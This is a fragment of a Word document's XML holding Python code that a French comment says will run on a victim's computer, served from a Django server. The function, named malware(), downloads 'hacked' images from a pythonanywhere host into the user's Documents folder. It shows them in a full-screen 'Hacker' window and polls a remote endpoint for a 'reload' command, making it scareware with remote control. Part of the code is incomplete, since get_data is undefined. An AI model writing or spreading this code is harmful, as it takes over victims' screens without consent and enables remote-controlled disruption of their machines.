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36F9" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3"/>
    <w:p w14:paraId="3F054320" w14:textId="48431718" w:rsidR="00253C6D" w:rsidRPr="00253C6D" w:rsidRDefault="00253C6D" w:rsidP="00340DD3">
      <w:r w:rsidRPr="00253C6D">
        <w:t xml:space="preserve"> #</w:t>
      </w:r>
      <w:r w:rsidR="009C161E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00253C6D">
        <w:t xml:space="preserve">le code qui </w:t>
      </w:r>
      <w:r>
        <w:t>va être exécuté sur l’ordinateur de la victime</w:t>
      </w:r>
      <w:r w:rsidR="00970CEB">
        <w:t>, stocké sur le serveur django</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CF3C36" w14:textId="77777777" w:rsidR="00253C6D" w:rsidRPr="00253C6D" w:rsidRDefault="00253C6D" w:rsidP="00340DD3"/>
    <w:p w14:paraId="5F32F720" w14:textId="47ECF712" w:rsidR="00340DD3" w:rsidRPr="00970CEB" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00970CEB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>import webbrowser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="413F6C74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>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39307236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>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129A53D1" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="458E365E" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC88BE3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>#webbrowser.open('https://www.coupcritique.fr/entity/actualities')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AB7834" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="682F3CBA" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7739A39A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>def malware():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79464AB2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import pyautogui</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AC8355" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D370050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import pygame.image</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3213CBE3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import urllib.request</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C81A09A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import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FB0551" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6007D84E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screen_size = pyautogui.size()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2802070C" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70D5219C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imgURL = rf"http://pythonanywherean.pythonanywhere.com/static/Battle/images/hacked1.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B775E19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urllib.request.urlretrieve(imgURL, rf"C:\Users\{os.getlogin()}\Documents\hacked1.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D61CBCE" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BD49F29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imgURL2 = rf"http://pythonanywherean.pythonanywhere.com/static/Battle/images/hacked2.png"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06EAD585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urllib.request.urlretrieve(imgURL2, rf"C:\Users\{os.getlogin()}\Documents\hacked2.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0DF8D3" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="050FA89F" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44C499E1" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45501678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img1 = pygame.image.load(rf"C:\Users\{os.getlogin()}\Documents\hacked1.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7AC93E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img1 = pygame.transform.rotozoom(img1, 0, screen_size[0]/img1.get_size()[0])</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D872C95" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45C640E5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img2 = pygame.image.load(rf"C:\Users\{os.getlogin()}\Documents\hacked2.png")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B47944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img2 = pygame.transform.rotozoom(img2, 0, screen_size[0]/img1.get_size()[0]/2)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639D0B01" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABC1562" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C8D1948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win = pygame.display.set_mode((0, 0), pygame.FULLSCREEN) # set window size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FC057" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="535293A2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pygame.display.set_caption("Hacker") # title of the screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F69960" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C66C475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pygame.init() # initializes pygame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D8B620B" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="473D19E9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# the function that will update the screen every frame</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E17D84A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def aff(win):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43D13DCA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win.fill((0, 0, 0)) # fills the screen with black</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D3C3CFB" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AFC57C8" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DC04B07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win.blit(img1, (0, 0)) #item[2] is the loaded image of this item</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350B2E4D" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08FC02E3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if time.time()-time_AA&gt;5:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470779CF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    win.blit(img2, (50, 50))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D8CEA6" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7C5E9F" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A46A29A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pygame.display.update() # finally you need this line to update the display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D8A133" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BACDE4B" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="61D8C8FF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data = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A3D240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time_AA = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC5C581" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D36C10D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while not("reload" in data):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1898EBBD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keys = pygame.key.get_pressed() # gets all pressed keys</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D98673C" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1ABD3DC5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aff (win) # updates the screen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68F7614A" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="755C52F5" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71E7839A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# I don't know why but you have to write the following lines otherwise the code won't work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B09BDC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for event in pygame.event.get():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67583CEF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    if event.type == pygame.QUIT:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F2679E3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        run = False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421EC3DE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        pygame.quit()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314D03A6" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7291D5A3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data = get_data(f"http://pythonanywherean.pythonanywhere.com/RecvData/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBDC25A" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DD5E585" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00340DD3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">        time.sleep(0.01) # to slow down the main loop (not really needed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D2C53A" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DE53ED3" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00340DD3" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0EA80F0E" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="00340DD3">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00253C6D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>malware()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C15489F" w14:textId="60563CDD" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6769CDA3" w14:textId="6102E0DF" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4679B21D" w14:textId="45B2D9FA" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="796124AF" w14:textId="1EC937C0" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="286C8310" w14:textId="65ECCD22" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="488686C4" w14:textId="6BECD8E1" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78491B1B" w14:textId="27A1E641" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="090B0071" w14:textId="061CA4B4" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13E742F8" w14:textId="2A00D2B3" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C9FF61D" w14:textId="1FB1B59E" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F912445" w14:textId="7E295BE8" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13B7C267" w14:textId="0BA9AB49" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="071CB609" w14:textId="738038AE" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="190B5B02" w14:textId="63AF0F80" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4DF28F0B" w14:textId="6D668843" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1186686E" w14:textId="6C6101A0" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="608843C5" w14:textId="669CC517" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2741EC1B" w14:textId="270B9F1A" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="03E37361" w14:textId="47CDF5ED" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43606CF3" w14:textId="654076AC" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7515A0DD" w14:textId="59C92C34" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15B1B2B7" w14:textId="77777777" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4E0850" w14:textId="22A1D455" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="355B909B" w14:textId="14C747FA" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C21081B" w14:textId="5A40B5D2" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7F8C1419" w14:textId="3BEC08FB" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69214F6F" w14:textId="3DF155C0" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E738D53" w14:textId="62019C8A" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72DF4FD8" w14:textId="7C06F904" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="328C0FDB" w14:textId="424912B6" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="085F94E8" w14:textId="55E03204" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14EBA3F7" w14:textId="2EFDEC69" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E633C07" w14:textId="2002C81D" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25C3C5C5" w14:textId="6286EA1C" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6CD02250" w14:textId="07C157B8" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F4EDCAD" w14:textId="2F74A07B" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="283D5B0A" w14:textId="54DA45A1" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54AE17C4" w14:textId="35D291B8" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2D1FAD" w14:textId="602515E6" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09C60188" w14:textId="0C35843E" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C1EFD16" w14:textId="4BE02888" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="717FC6D7" w14:textId="4DFC135A" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A7F373D" w14:textId="5D770D4E" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B4643A0" w14:textId="119D263F" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D0FF8D" w14:textId="70E894B1" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="259D4DA7" w14:textId="1EB8C32E" w:rsidR="00340DD3" w:rsidRPr="00253C6D" w:rsidRDefault="00340DD3" w:rsidP="003E71CA">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
